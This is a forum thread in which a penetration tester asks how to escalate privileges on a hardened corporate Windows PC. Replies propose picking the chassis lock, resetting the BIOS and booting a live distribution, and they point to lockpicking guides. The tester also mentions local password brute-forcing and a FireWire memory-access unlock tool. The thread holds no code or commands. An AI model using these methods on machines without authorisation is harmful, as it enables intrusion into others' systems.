Page 1 of 2 12 LastLast
Results 1 to 10 of 23

Thread: HELP - Escalate privilege in (well configured) Windows.

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default HELP - Escalate privilege in (well configured) Windows.

    Hi,

    I'm pen-testing a different environment, my pen-test is internal (more like insider).

    All I have is a PC from the company (without any tools, only Windows) connected to the local network.

    My job is (try) escalate privilege in this machine and get into the servers on the network.

    Until here, all appear very easy, but have some special points:

    - The computer have a clean Windows installations (with a small number of third programs, just a MS office, AntiVirus, and a program used internal - a kind of ERP).

    - The Windows system is FULL patched (WSUS).

    - My user privilege is very low, i have basic no permissions at computer.

    - The computer also have strong Windows Polices (I can't change wallpapers, see configuration properties, etc).

    - The computer have the disc encrypted (A kind of TrueCrypt).

    - The computer have a CD-ROM and USB port, HOWEVER I'm unable to acess it (some program (maybe a end point security?) doesn't allow me to access it.

    - The sequence of BOOT doesn't allow boot via CD or USB.

    - The BIOS boot is protected by passwords.

    - All physical ports in the CPU are locked with a kind of "pad locks" for computers.

    - The PC do not have internet connection.

    - I can not use my own laptop in the network cable.

    - There is no Wireless network.


    NOW..... What I thinked!

    - Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd), however it need administrative privilege.

    - By the way, boot with BT on CD or USB is not possible.

    - I had think in try a local brute force against the administrator account, since it's local, maybe it can work. Maybe there is a kind of fast (multi thread) tool which allow locally brute force windows (maybe via "runas" feature) accounts? Anyone have any hint for me?

    - I remember sometime ago a lot of people in the internet spoke that a "firewire" device could be used to break into any windows. A kind of "plug and root" via firewire, where it could copy hash files or unluck Administrator password. Someone aware (link) with detailed description about how to build one?

    I found:

    W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vis ta.htm

    And even:

    storm.net.nz/static/files/winlockpwn

    The big question is, how to build one? Which I need? I really need a Ipod? Can't be something less expensive? Maybe my own computer? There is someplace a step by step?

    Obs.: All sites with "W W W" you must remove the space, I type in this way, because my account in forum is not allowed to post URL yet.

    I have no more ideas.

    Do you have any idea or hint to me? All syggestions are welcome.

    Thanks

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    -Monkeys are like nature's humans.

  3. #3
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by =Tron= View Post
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.

    Overall, this sounds like a fairly secure PC for the 'average user' in a business environment.


    I'm with Tron on this:

    1) Pick the lock and reset the BIOS.
    2) Set BIOS for USB or CD boot.
    3) Boot BT (or other Live Distro) in appropriate device.
    4) Proceed with attack(s) from there.

    Of course, some of this depends on the scope of the contract. For example, are you allowed to physically open the machine under the contract?

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    Thorn
    Stop the TSA now! Boycott the airlines.

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    This is the part I don't understand either. These seem like extreme parameters for a business level pentest. Maybe if we knew the terms of the contract we could help find a loop hole.

  5. #5
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default

    Hi guys,

    Thank you for all help.

    I was not aware of this "beer can", it is really incrediable!

    It worked (took some time, but worked). Amazing!

    I seen in the same site tricks to open MasterLocks, but they also say it doesn't work in new versions. Also I seen on internet (link broken) a tool that calculate the numbers for you. All very nice and different for me.

    Someone know a good site with this tricks for begginers like me? Maybe with videos of build and lockpick different locks?

    In special....

    - Someone know where a non USA guy can by via internet a kit like this MPSX-32?

    - Someone know any tricks to unlock padlocks approved by TSA (using Keys)?

    - A working link to this program able to calcule MasterLock combination and a explanation about how to use it?

    Links are very welcome.

    Lolll, I'm changing BackTrack forum into a Lockpicking forum o.O

    Thanks

    cya

  6. #6
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Smile

    Flex your Google'fu and look for the "MIT Guide To Lockpicking", its written by 'Ted the Tool' and although its 10-15yrs old now it explains the theory and practice of lockpicking in a easily understandable way. Its a bit hard to find but well worth it as it will explain so much to you.

    I can't help you with anywhere to buy lock-picks, but they are easy to make once you understand what is actually going on inside the lock, my best picks are 'modified' dentists scrappers,wire from inside pipe cleaners and a Oral-B electric toothbrush with a customised end......

    TT

    ps: its not suprising that many forum members are interested, lockpicking and 'hacking' share many of the same skills and thought processes.

  7. #7
    Member
    Join Date
    Feb 2008
    Posts
    74

    Default

    look up the following organizations: Toolnl, ssdev, Locksport International, Toool US, and NDE magazine. Some of them sell tools and have additional information.

  8. #8
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    9

    Default

    Quote Originally Posted by Talkie Toaster View Post
    Flex your Google'fu and look for the "MIT Guide To Lockpicking", its written by 'Ted the Tool' and although its 10-15yrs old now it explains the theory and practice of lockpicking in a easily understandable way. Its a bit hard to find but well worth it as it will explain so much to you.
    A nice little bedtime read, Thanks for the lead Talkie

  9. #9
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default

    Quote Originally Posted by =Tron= View Post
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I love your method!

    But seriously though, in the UK computer locks and those easily pickable 'circle key' cam locks were never very popular, but i sometimes see them on US stuff on ebay. Maybe a pentesters guide on how to do this safely without breaking anything (clients machine remember...) would be useful, as most of the ones coming up on google seem to be for skiddies or for people with stolen laptops!

    The MIT guide to lockpicking by a guy called Ted The Tool is a good place to start. i'm sure it will be of interest to many members here. Think of it as 'hacking' a lock!

    TT

  10. #10
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Default

    Hi,

    Thank you all for replys.

    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I spoke with the contractors and it's allowed. However I was unable to lockpick the device. It's a secure pad-lock more or less like this (don't know the name of this lock in english):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also this device have a key, so you only open it if you are able to unlock (or lockpick) both, the number sequence + key.

    In the client, is a division that is responsible for physical security and they control all environment via video cameras, if I start to play much time with the lock, they come and warning me it's not allowed and I can suffer legal action. Obvious, when I explain the case and they speak with the manager of the project all be good.

    In the end, I think I will not be open this padlock.

    Out of curiousity, why aren't you allowed to use a laptop on the network?
    Because here is a controlled environment, where only have some special employs (they access really sensitive data), no one is allowed to enter in the environment with laptops, cellphones, pda, etc.

    So the goal of the project, is identify what a real employ with bad intentions should be able to do and access....

    I looked at BT3 and it have the firmware exploit (storm.net.nz/static/files/winlockpwn) to unlock Windows machine, maybe it can be my way to break into.

    Someone already used it with sucess? What I need to create a firewire exploit device to exploit it?

    Is possible to do it directly with a firewall cable, connected between 2 computers (victim and attacker)?

    Someone have a link about how to build one or a description?

    Any other ideas are welcome...

    Thanks

    cya

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •